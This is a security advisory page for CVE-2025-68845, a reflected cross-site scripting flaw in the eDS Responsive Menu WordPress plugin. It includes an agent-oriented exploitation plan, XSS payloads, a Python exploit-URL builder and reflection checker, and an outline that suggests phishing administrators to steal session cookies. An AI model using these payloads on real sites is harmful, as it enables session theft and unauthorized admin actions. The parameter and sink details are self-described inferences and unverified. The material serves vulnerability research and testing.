CVE-2025-68845

eDS Responsive Menu <= 1.2 - Reflected Cross-Site Scripting

Severity: medium
Weakness: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSS Score: 6.1
Patched in: Unpatched
Time to patch: N/A

Description

The eDS Responsive Menu plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 1.2
Published: January 27, 2026
Last updated: February 2, 2026
Affected plugin: eds-responsive-menu
Research Plan
Unverified


Exploitation Research Plan - CVE-2025-68845

1. Vulnerability Summary

The eDS Responsive Menu plugin (<= 1.2) for WordPress contains a Reflected Cross-Site Scripting (XSS) vulnerability. This occurs because the plugin reflects user-supplied input from the URL (typically $_GET parameters) directly into the HTML response of an admin page or a frontend component without sufficient sanitization (e.g., using sanitize_text_field) or context-aware escaping (e.g., esc_attr or esc_html).

2. Attack Vector Analysis

  • Endpoint: Admin Dashboard Settings Page.
  • Vulnerable Page: /wp-admin/admin.php?page=eds-responsive-menu (Inferred from plugin slug).
  • Vulnerable Parameter: tab, message, id, or eds-responsive-menu (Inferred).
  • Authentication Level: Unauthenticated to craft/send the link; Admin (or high-privilege user) to click and execute the payload.
  • Preconditions: The plugin must be installed and active. The attacker must trick a logged-in administrator into clicking a malicious link.

3. Code Flow

Since source files are not provided, the following flow is inferred based on standard WordPress plugin patterns for Reflected XSS:

  1. Entry Point: The plugin registers an admin menu page using add_menu_page() or add_submenu_page() in the main plugin file or an admin-specific class.
  2. Hook: admin_menu or admin_init.
  3. Vulnerable Function: The callback function assigned to the menu page (e.g., eds_responsive_menu_settings_page).
  4. Processing: Inside this callback, the code retrieves a parameter from the URL: $current_tab = $_GET['tab']; (Inferred).
  5. Sink: The code echoes this variable directly into an HTML attribute or a <div> tag: echo '<div class="tab-content">' . $current_tab . '</div>'; or <input type="hidden" name="tab" value="' . $current_tab . '"> without esc_attr().

4. Nonce Acquisition Strategy

Reflected XSS typically does not require a nonce to execute because the vulnerability lies in the reflection of a parameter during a GET request to a page the victim is already authorized to view.

If the reflection happens after a form submission (POST):

  1. Identify the page containing the form: /wp-admin/admin.php?page=eds-responsive-menu.
  2. Navigate to the page using browser_navigate.
  3. Use browser_eval to extract the nonce: window.eds_res_nonce or from a hidden field: jQuery('input[name="_wpnonce"]').val().
  4. Note: As this is a Reflected XSS (CVSS UI:R), the payload is usually delivered via a crafted URL that triggers the reflection on load.

5. Exploitation Strategy

The goal is to demonstrate that an arbitrary script can execute in the context of the administrator's session.

Step-by-Step Plan:

  1. Identify Sink: List every $_GET/$_REQUEST read in the plugin with line numbers and follow each variable to the echo that outputs it. A grep for echo $_GET alone would miss the concatenated sink inferred in Section 3 (the value is first assigned to $current_tab), so search for the superglobal reads themselves:
    grep -rnP "\\\$_(GET|REQUEST)\[" wp-content/plugins/eds-responsive-menu/
    
  2. Craft Payload: Based on the sink discovered:
    • If in a tag body: <script>alert(document.domain)</script>
    • If in an attribute: "><script>alert(1)</script>
  3. Construct Exploit URL:
    http://localhost:8080/wp-admin/admin.php?page=eds-responsive-menu&tab=%3Cscript%3Ealert(document.domain)%3C/script%3E (Replace tab with the actual vulnerable parameter).
  4. Execute via Agent:
    • Use browser_navigate to simulate the Admin clicking the link.
    • Check for an alert box or the presence of the unescaped script in the DOM.

6. Test Data Setup

  1. Activate Plugin:
    wp plugin activate eds-responsive-menu
    
  2. Configuration: No specific configuration is usually required, but ensure at least one menu is created if the settings page requires it to render the vulnerable section.
    # (Optional) If settings require an ID
    wp option update eds_responsive_menu_settings '{"example":"data"}'
    

7. Expected Results

  • The HTTP response from the admin.php request will contain the literal, unencoded string <script>alert(document.domain)</script>.
  • When viewed in a browser (simulated via Playwright), a JavaScript alert/execution will occur.
  • The http_request tool will show the payload in the raw HTML body.

8. Verification Steps

  1. Verify via grep: Confirm the presence of the payload in the saved response body of the http_request.
  2. Verify via CLI: Use WP-CLI to confirm that the plugin is active and that the installed version is within the affected range (<= 1.2):
    wp plugin get eds-responsive-menu --field=version
    
  3. Confirm Lack of Sanitization: Check the source code at the line identified by grep in Step 5.1 to confirm esc_html/esc_attr is missing.
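The following is an added example for the plan's exploitation (Section 5) and verification (Sections 7 and 8) steps; it is not code from the eDS Responsive Menu plugin or from the advisory. It builds one candidate URL per inferred parameter and classifies a captured response body as a raw reflection (exploitable), an entity-escaped reflection (esc_html/esc_attr applied) or no reflection, and for raw reflections reports whether the payload landed in a tag body, an attribute or a script block, which decides which payload shape fires. The admin page slug, the parameter names and the sample responses are assumptions constructed for illustration, not confirmed facts about the plugin.

```python
"""Reflected-XSS URL builder and response classifier for the CVE-2025-68845 plan.

Added example, not plugin or advisory code. The page slug, candidate parameter
names and sample bodies below are assumptions constructed for illustration.
"""
import html
from urllib.parse import urlencode, urljoin

PAYLOAD_TAG_BODY = "<script>alert(document.domain)</script>"
PAYLOAD_ATTRIBUTE = '"><script>alert(1)</script>'

# Parameter names the research plan lists as inferred; none is confirmed.
CANDIDATE_PARAMS = ("tab", "message", "id", "view", "error")


def build_exploit_urls(base_url, page_slug, payload, params=CANDIDATE_PARAMS):
    """One candidate URL per parameter. urlencode percent-encodes the payload,
    so the browser, not the transport, reconstructs the literal characters."""
    urls = {}
    for name in params:
        query = urlencode({"page": page_slug, name: payload})
        urls[name] = urljoin(base_url, "/wp-admin/admin.php?" + query)
    return urls


def classify_reflection(body, payload):
    """'raw' if the payload is reflected byte-for-byte (exploitable sink),
    'escaped' if only an entity-encoded form appears (esc_html/esc_attr applied),
    'absent' if the parameter is not reflected at all."""
    if payload in body:
        return "raw"
    escaped = html.escape(payload, quote=True)
    # WordPress esc_attr()/esc_html() encode a single quote as &#039;, Python as &#x27;.
    wp_escaped = escaped.replace("&#x27;", "&#039;")
    if escaped in body or wp_escaped in body:
        return "escaped"
    return "absent"


def reflection_context(body, payload):
    """Where a raw reflection lands: 'script' inside a <script> block,
    'attribute' inside an open tag, 'text' in a tag body; None if not raw."""
    idx = body.find(payload)
    if idx == -1:
        return None
    before = body[:idx]
    lowered = before.lower()
    last_open = lowered.rfind("<script")
    if last_open != -1 and lowered.rfind("</script>") < last_open:
        return "script"
    # An unclosed '<' before the payload means we are still inside a tag.
    if before.rfind("<") > before.rfind(">"):
        return "attribute"
    return "text"


def find_reflected_params(responses, payload):
    """Given {param_name: response_body}, return the parameters whose response
    reflects the payload raw, mapped to the context of that reflection."""
    return {
        name: reflection_context(body, payload)
        for name, body in responses.items()
        if classify_reflection(body, payload) == "raw"
    }


# Constructed sample responses (not captured from the plugin).
SAMPLE_RAW = '<div class="tab-content"><script>alert(document.domain)</script></div>'
SAMPLE_ESCAPED = ('<div class="tab-content">'
                  '&lt;script&gt;alert(document.domain)&lt;/script&gt;</div>')
SAMPLE_ATTR = '<input type="hidden" name="tab" value=""><script>alert(1)</script>">'
SAMPLE_ABSENT = '<div class="tab-content">general</div>'


if __name__ == "__main__":
    urls = build_exploit_urls("http://localhost:8080", "eds-responsive-menu",
                              PAYLOAD_TAG_BODY)
    for name, url in urls.items():
        print(name, url)
    print(find_reflected_params({"tab": SAMPLE_RAW, "message": SAMPLE_ESCAPED,
                                 "id": SAMPLE_ABSENT}, PAYLOAD_TAG_BODY))
```

Feed each captured body from the http_request step to find_reflected_params; an "escaped" result for every candidate means the plan's inferred sink is not present on that page and the alternative approaches in Section 9 are the next step, while an "attribute" context means the tag-body payload will not fire and the attribute-breaking payload should be retried.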

9. Alternative Approaches

If the tab parameter is not vulnerable:

  • Search for other parameters: Check for message, error, id, view.
  • Frontend Reflection: Check if the plugin reflects parameters on the frontend when a shortcode like [eds-menu] is present.
    1. Create page (the slug is set explicitly so the test URL below resolves): wp post create --post_type=page --post_status=publish --post_title='Test Page' --post_name=test-page --post_content='[eds-menu]'
    2. Test URL: http://localhost:8080/test-page/?menu_id=<script>alert(1)</script>
  • Check for wp_localize_script: If the reflection lands inside a <script> block (for example via wp_localize_script or inline JavaScript), check whether the value passes through esc_js() or wp_json_encode() before output; a value concatenated raw into a JavaScript string literal allows breaking out of the string, and HTML-entity escaping alone does not protect that context.
Research Findings
Static analysis — not yet PoC-verified

Summary

The eDS Responsive Menu plugin for WordPress (<= 1.2) is vulnerable to Reflected Cross-Site Scripting (XSS) due to insufficient input sanitization and output escaping on its admin settings page. Unauthenticated attackers can exploit this by tricking a logged-in administrator into clicking a crafted link, resulting in the execution of arbitrary JavaScript in the victim's browser session.

Exploit Outline

1. Identify the plugin's admin configuration page, usually located at /wp-admin/admin.php?page=eds-responsive-menu.
2. Locate a URL parameter that is reflected directly into the HTML response without context-aware escaping (e.g., 'tab', 'id', or 'message').
3. Construct a malicious URL by appending a JavaScript payload, such as <script>alert(document.domain)</script>, to the vulnerable parameter.
4. Deliver the crafted URL to a logged-in administrator via social engineering (e.g., a spear-phishing email or comment link).
5. Once the administrator clicks the link, the injected script executes in their browser context, potentially allowing the attacker to steal session cookies or perform unauthorized administrative actions.
